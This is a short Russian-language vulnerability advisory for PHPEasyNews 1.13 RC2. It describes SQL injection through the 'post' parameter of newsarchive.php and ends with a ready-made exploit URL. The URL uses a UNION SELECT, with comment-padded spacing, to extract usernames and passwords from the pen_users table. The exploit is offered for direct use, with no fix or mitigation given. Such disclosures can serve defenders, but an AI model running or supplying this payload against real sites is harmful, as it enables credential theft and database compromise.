Программа: PHPEasyNews 1.13 RC2

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «post» сценарием newsarchive.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://site.com/newsarchive.php?post=-1/**/UNION/**/ALL/* */SELECT/**/1,CONCAT(username,0x3a,password),3,4,5,6/*
*/FROM/**/pen_users/*



Оставить мнение